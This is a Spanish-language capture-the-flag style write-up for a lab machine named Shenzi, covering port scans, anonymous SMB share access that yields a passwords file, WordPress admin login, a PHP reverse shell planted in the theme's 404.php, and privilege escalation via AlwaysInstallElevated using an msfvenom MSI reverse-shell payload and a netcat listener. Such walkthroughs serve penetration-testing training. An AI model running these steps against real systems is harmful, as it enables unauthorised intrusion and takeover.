# MAQUINA SHENZI (Enum SMB 'nullsesion' + Directory Web = Nombre del recurso compartido + WORDPRESS RC

Enumere los puertos de la maquina.

```
nmap -p- --open -sS --min-rate 3000 -n -vvv -Pn 192.168.104.55 -oG Basicscan.txt
```

![](https://2262788210-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Ff1UWZ7xdDAb8KAEfAIlA%2Fuploads%2Fvn1ztnm1m9IZqFfiIluT%2F0.png?alt=media)

Puertos abiertos:

`21,80,135,139,443,445,3306,5040,7680,49664,49665,49666,49667,49668,49669`

Realice una enumeración de los servicios y sus versiones.

```
nmap -p21,80,135,139,443,445,3306,5040,7680,49664,49665,49666,49667,49668,49669 -sCV
```

![](https://2262788210-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Ff1UWZ7xdDAb8KAEfAIlA%2Fuploads%2FnrMN0r3acddPGANtRCeW%2F1.png?alt=media)

Busque si estos servicios contienen alguna vulnerabilidad utilizando scripts de nmap, pero no contenían ninguna vuln.

```
nmap -p21,80,135,139,443,445,3306,5040,7680,49664,49665,49666,49667,49668,49669 --sc
```

![](https://2262788210-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Ff1UWZ7xdDAb8KAEfAIlA%2Fuploads%2Fdk2EtlevLXPJVrcJ4fDU%2F2.png?alt=media)

![](https://2262788210-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Ff1UWZ7xdDAb8KAEfAIlA%2Fuploads%2Fdbq2q6VipFj2EVnDUBFa%2F3.png?alt=media)

Utilice la herramienta nxc para verificar ante que windows me enfrento.

```
nxc smb 192.168.104.55
```

![](https://2262788210-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Ff1UWZ7xdDAb8KAEfAIlA%2Fuploads%2FSm2stQEvOXHmhJCQN2F9%2F4.png?alt=media)

Con smbclient utilizando el parámetro -N para que me conecte a través de una null sesión y luego el parámetro -L para que liste los recursos compartidos del servicio SMB.

```
smbclient -N -L 192.168.104.55
```

![](https://2262788210-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Ff1UWZ7xdDAb8KAEfAIlA%2Fuploads%2F5UC6SOUXepC6SKuJo06d%2F5.png?alt=media)

Dentro de los recurso encontre una carpeta con nombre "Shenzi".

Con el siguiente comando a través de la null sesión accedí al servicio SMB.

```
smbclient -N \\192.168.104.55\\shenzi
```

Ya dentro de la carpeta, descargo el contenido con el comando "get"

![](https://2262788210-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Ff1UWZ7xdDAb8KAEfAIlA%2Fuploads%2FzT61ZQ54BAIWiKvLR9X4%2F6.png?alt=media)

Explore el archivo password el cual observe que contiene varias credenciales, la interesante es la del wordpress.

![](https://2262788210-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Ff1UWZ7xdDAb8KAEfAIlA%2Fuploads%2FvB1PUqssAy8wxzpRImSa%2F7.png?alt=media)

![](https://2262788210-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Ff1UWZ7xdDAb8KAEfAIlA%2Fuploads%2FAqTpiCUJySmkVMe745z6%2F8.png?alt=media)

Ingrese al servicio web que corre tanto en el puerto 80 http como el en servicio web 443 http. En el puerto 80 encontré una web sobre XAMPP.

<http://192.168.104.55/dashboard>

![](https://2262788210-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Ff1UWZ7xdDAb8KAEfAIlA%2Fuploads%2FItKShV8hZ71uQg0W2STs%2F9.png?alt=media)

Con wappalizer observe las tecnlogias que corren en el sitio web.

![](https://2262788210-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Ff1UWZ7xdDAb8KAEfAIlA%2Fuploads%2FqqDoAbwtnSbCwcDnreOg%2F10.png?alt=media)

Encontré un apartado donde puedo observar el phpinfo.

![](https://2262788210-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Ff1UWZ7xdDAb8KAEfAIlA%2Fuploads%2F3T2f7uYNeYgT5fuHmfGW%2F11.png?alt=media)

![](https://2262788210-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Ff1UWZ7xdDAb8KAEfAIlA%2Fuploads%2FZXT1kJVC7z30j19XL3RF%2F12.png?alt=media)

Realice una búsqueda de directorios pero no encontré nada interesante.

Coloque el nombre del archivo compartido "shenzi" como directorio y me llevo a un wordpress.

![](https://2262788210-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Ff1UWZ7xdDAb8KAEfAIlA%2Fuploads%2FLfxVWGPBTPzVa3D1baM2%2F13.png?alt=media)

![](https://2262788210-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Ff1UWZ7xdDAb8KAEfAIlA%2Fuploads%2Fn3i1mJpgPW9zJPCUotey%2F14.png?alt=media)

En el puerto 80 al dirigirme al panel de sesión me devuelve un error por lo que realice lo mismo pero en el puerto 443 https.

![](https://2262788210-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Ff1UWZ7xdDAb8KAEfAIlA%2Fuploads%2F7EBKqDQmhqwe7iZJtJlB%2F15.png?alt=media)

Logre acceder al panel de sesión, seguido coloque las credenciales encontradas aquí y me adentre al panel como administrador.

![](https://2262788210-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Ff1UWZ7xdDAb8KAEfAIlA%2Fuploads%2F5XLfxDwuzrFNrEv4TliB%2F16.png?alt=media)

![](https://2262788210-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Ff1UWZ7xdDAb8KAEfAIlA%2Fuploads%2FNikOhCNj6hxH91drsYTG%2F17.png?alt=media)

Para realizar una revershell modifique el contenido del error 404.php editando los temas.

![](https://2262788210-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Ff1UWZ7xdDAb8KAEfAIlA%2Fuploads%2FBkJno3DaJSHqWOzYb4bP%2F18.png?alt=media)

![](https://2262788210-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Ff1UWZ7xdDAb8KAEfAIlA%2Fuploads%2F8Pjw1RIM55Y8QIvT7adn%2F19.png?alt=media)

![](https://2262788210-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Ff1UWZ7xdDAb8KAEfAIlA%2Fuploads%2FB5KUtGU5UFSBBC0ewHxw%2F20.png?alt=media)

Una vez que agregue mi revershell maliciosa actualice la web seguidamente en mi kali coloque me puse en escucha con netcat.

```
rlwrap nc -nlvp 80 # mi kali
```

Ya listo en la URL me dirijo al apartado 404.php donde esta mi revershell

<https://192.168.104.55/404.php>

Esto va a devuelve la conexión a mi maquina kali.

<figure><img src="https://2262788210-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Ff1UWZ7xdDAb8KAEfAIlA%2Fuploads%2F1Ii9WrY7n8yjT0hZyqc3%2FCaptura%20de%20pantalla%202025-01-16%20202549.png?alt=media&#x26;token=0f853244-1154-4ca5-a823-bc399fe46829" alt=""><figcaption></figcaption></figure>

Ya dentro de la maquina windows, me cree un carpeta de trabajo llamada /tmp, ahora subi el ejecutable winpeas y luego lo ejecuto.

<figure><img src="https://2262788210-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Ff1UWZ7xdDAb8KAEfAIlA%2Fuploads%2FY9z3SkuOSYE4oX3Xa4mn%2FCaptura%20de%20pantalla%202025-01-16%20203216.png?alt=media&#x26;token=ca4c3195-bcc8-4bd8-b487-1a8f8a5c20e1" alt=""><figcaption></figcaption></figure>

Terminado de realizar el reconocimiento observe que tengo el permiso AlwaysInstallElevated.

<figure><img src="https://2262788210-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Ff1UWZ7xdDAb8KAEfAIlA%2Fuploads%2FWA3hRmBYDOqPT6TmdYiy%2FCaptura%20de%20pantalla%202025-01-16%20204934.png?alt=media&#x26;token=e1f32e01-dfd1-4433-839d-13e86a49cb3f" alt=""><figcaption></figcaption></figure>

<figure><img src="https://2262788210-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Ff1UWZ7xdDAb8KAEfAIlA%2Fuploads%2FAKsuKFtBR7GCkqStbq3F%2FCaptura%20de%20pantalla%202025-01-16%20205111.png?alt=media&#x26;token=dde0c4bc-3968-4db9-8e4b-801a1cbc0b77" alt=""><figcaption></figcaption></figure>

`Cuando la configuración AlwaysInstallElevated  se establece en 1 en ambos el HKLM (HKEY_LOCAL_MACHINE) y HKCU (HKEY_CURRENT_USER) claves de registro, indica que los paquetes de instalación se están instalando con privilegios elevados`

Para abusar de esto y poder escalar privilegios lo que realice fue crear un ejecutable con msfvenom.

```
msfvenom -p windows/x64/shell_reverse_rcp LHOST=192.168.45.233 LPORT=1234 -f msi > r
```

<figure><img src="https://2262788210-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Ff1UWZ7xdDAb8KAEfAIlA%2Fuploads%2FEvBOxpGlW2XjIDZzGCGc%2FCaptura%20de%20pantalla%202025-01-16%20205825.png?alt=media&#x26;token=fcbd56c4-7065-4805-a8b6-1ee262ceb0de" alt=""><figcaption></figcaption></figure>

La extensión MSI:

Un archivo MSI es un archivo de instalación de Microsoft Windows Installer. Este tipo de archivo se utiliza para instalar, actualizar y desinstalar software en sistemas operativos Windows.

Luego subí el binario de netcat x64 como la revershell.msi

<figure><img src="https://2262788210-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Ff1UWZ7xdDAb8KAEfAIlA%2Fuploads%2FOzUE446ySFPaCEsAkItd%2FCaptura%20de%20pantalla%202025-01-16%20205533.png?alt=media&#x26;token=05a716d8-136b-40fd-b69f-419415263c6e" alt=""><figcaption></figcaption></figure>

Ya teniendo estos 2 archivos me conecte en mi kali por el puerto donde cree la revershell.msi "1234" y seguido a eso ejecute la revershell.msi en la maquina windows.

<figure><img src="https://2262788210-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Ff1UWZ7xdDAb8KAEfAIlA%2Fuploads%2FPvSQdrB90Q1DSzEvcsO5%2FCaptura%20de%20pantalla%202025-01-16%20205901.png?alt=media&#x26;token=8b278843-a763-4606-b9fe-cec89684ab36" alt=""><figcaption></figcaption></figure>